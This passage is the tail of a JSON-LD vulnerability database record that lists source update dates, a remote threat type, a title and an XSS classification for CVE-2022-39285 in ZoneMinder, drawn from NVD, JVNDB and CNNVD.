        "db": "NVD",
        "id": "CVE-2022-39285"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-10-20T08:27:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-018651"
      },
      {
        "date": "2023-03-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202210-333"
      },
      {
        "date": "2023-03-27T18:15:11.557000",
        "db": "NVD",
        "id": "CVE-2022-39285"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202210-333"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ZoneMinder\u00a0 Cross-site scripting vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-018651"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202210-333"
      }
    ],
    "trust": 0.6
  }
}

